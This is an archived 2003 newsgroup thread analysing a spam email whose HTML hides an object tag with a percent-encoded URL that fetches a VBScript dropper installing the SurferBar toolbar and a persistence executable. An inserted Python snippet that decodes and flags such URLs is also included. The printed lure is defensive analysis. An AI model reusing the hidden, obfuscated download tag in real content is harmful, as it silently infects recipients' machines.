Weird mail trying top get "a.cgi", any ideas ?

 
 
Maxime Ducharme
3rd Sep 2003

Hi,
I received a suspicious email which seems to be an exploit
of OE to infect people with a trojan or something like that.


Here's what the email source looks like (I removed SMTP IPs & Received
headers):

=================== BEGIN SOURCE =================
Message-ID: <h54$-9mutb8--6@qw4.3uoi56>
From: "Lorna Roach" <(E-Mail Removed)>
Reply-To: "Lorna Roach" <(E-Mail Removed)>
To: <(E-Mail Removed)>, <(E-Mail Removed)>
Subject: Hey
Date: Wed, 03 Sep 03 22:41:51 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="AF3E6...967056.7.08E03F7"
X-Priority: 3
X-MSMail-Priority: Normal
X-Return-Path: (E-Mail Removed)


--AF3E6...967056.7.08E03F7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<head>
<div style=3D"display.none"><object data=3D"http://%363.2%346.=
%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
</head>
<body>
<p>Hey,</p>
<p>How have you been?&nbsp; What have you been doing lately?</p>
<p>Ive just been at home doing nothing bored at uni etc.</p>
<p>Anyway's lets catch up soon,</p>
<p>Luv,<br>You know who </p>
<p>&nbsp;</p>
</body>
</html>

--AF3E6...967056.7.08E03F7--
=================== END SOURCE =================


This code tries to download this file :

http://63.246.130.201/cgi-bin/a.cgi

This host doesn't answer my pings and its TCP port 80 is stealthed.

I didn't find anything on Google yet.

Does someone recognize a virus in this, or am I targeted by someone?

I do not like the fact that the email is targeted at 2 specific addresses
of our organisation.

Thanks for any reply

---------------------------------------------------------------
Maxime Ducharme
Network Administrator, Programmer
Pandore-Design [http://www.pandore-design.com]



 
Nick FitzGerald
4th Sep 2003
"Maxime Ducharme" <(E-Mail Removed)> wrote:

I saw my first of these last night and have had a couple more reports
this morning...

> I received a suspicious email which seems to be an exploit
> of OE to infect people with a trojan or something like that.


Close, yes...

> Here's what the email source looks like (I removed SMTP IPs & Received
> headers):


If you would not mind, I'd like to know the originating IP (or mail server).
If you'd rather not post it publicly, please send it to me via Email.

<<snip>>
> <head>
> <div style=3D"display.none"><object data=3D"http://%363.2%346.=
> %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>


"URL escaped" encoding of a URL to a file called a.cgi which is a VBScript that
drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
(that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
10-second sleep loop making sure that its own auto-start and two of SurferBar's
registry configuration settings are present. The SurferBar toolbar also makes
a large number of (pretty tastelessly named) shortcuts in your Start menu and
in the "Programs" sub-menu thereunder...

> This code tries to download this file :
>
> http://63.246.130.201/cgi-bin/a.cgi


Yep -- that's what the above encoded URL decodes to...

> This host doesn't answer my pings and its TCP port 80 is stealthed.


Yes -- it does seem rather dead now, but last night I could d/l that file and
the SurferBar toolbar .DLL the downloader is programmed to grab. The main
surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
seems to be now... (Hopefully this means the hosting company has closed
surferbar.com down...)

> I didn't find anything on Google yet.


Try Google Groups and search for "surferbar". There were a couple of dozen hits
going back 2 or 3 days last night.

> Does someone recognize a virus in this, or am I targeted by someone?


AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
spammed.

> I do not like the fact that the email is targeted at 2 specific addresses
> of our organisation.


Huh???

> Thanks for any reply



--
Nick FitzGerald
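Decoding the obfuscated URL from the message source above, as an added example that is not part of the thread: it undoes the quoted-printable wrapping, pulls every `<object data=...>` URL out of the HTML, percent-decodes it the way the browser would, and flags URLs that percent-encode unreserved characters (letters, digits, dots, slashes), which a legitimate URL never needs to do and which is why the host was unreadable at a glance. The sample input is the `<object>` line from the email above, re-typed here as constructed test data.

```python
import quopri
import re
from urllib.parse import unquote

# Constructed sample: the hidden <div>/<object> line from the email body quoted
# in this thread, as it appears in the quoted-printable encoded part
# ("=3D" is an encoded "=", a trailing "=" is a soft line break).
SAMPLE_QP = (
    b'<div style=3D"display.none"><object data=3D"http://%363.2%346.=\n'
    b'%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>\n'
)

# Matches the data="..." attribute of an <object> element after QP decoding.
OBJECT_DATA = re.compile(r'<object[^>]*\sdata="([^"]+)"', re.IGNORECASE)


def extract_object_urls(qp_body):
    """Undo quoted-printable (soft breaks, =3D) and return every object data= URL."""
    html = quopri.decodestring(qp_body).decode("latin-1")
    return OBJECT_DATA.findall(html)


def decode_url(url):
    """Percent-decode the URL exactly as the browser does before fetching it."""
    return unquote(url)


def is_obfuscated(url):
    """Heuristic: any %XX that decodes to an unreserved character (or '/') was
    encoded only to hide the URL from a human reader, not for the browser."""
    for m in re.finditer(r"%([0-9A-Fa-f]{2})", url):
        ch = chr(int(m.group(1), 16))
        if ch.isalnum() or ch in "-._~/":
            return True
    return False


def analyse(qp_body):
    """Return one record per embedded object URL: raw, decoded and verdict."""
    results = []
    for raw in extract_object_urls(qp_body):
        results.append({
            "raw": raw,
            "decoded": decode_url(raw),
            "obfuscated": is_obfuscated(raw),
        })
    return results


if __name__ == "__main__":
    for rec in analyse(SAMPLE_QP):
        print(rec)
```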


 
Elson Mat
4th Sep 2003
Try this info, Symantec found it yesterday.

http://securityresponse.symantec.com...ad.aduent.trojan.html


 
Lord Shaolin
4th Sep 2003
"Elson Mat" <it.a.sankyu.com.hk> wrote in message
news:bj66pm$(E-Mail Removed)...
> Try this info, Symantec found it yesterday.
>
> http://securityresponse.symantec.com...ad.aduent.trojan.html

And Spybot S&D has been able to remove it for a while; nasty thing that it
is.

--

-+ Shaolin +-
Discard what is useless, absorb what is not and
add what is uniquely your own.

.: http://www.security-forums.com :.


 
Maxime Ducharme
4th Sep 2003

Thanks Nick, Elson & Lord for your answers

---------------------------------------------------------------
Maxime Ducharme
Network Administrator, Programmer




 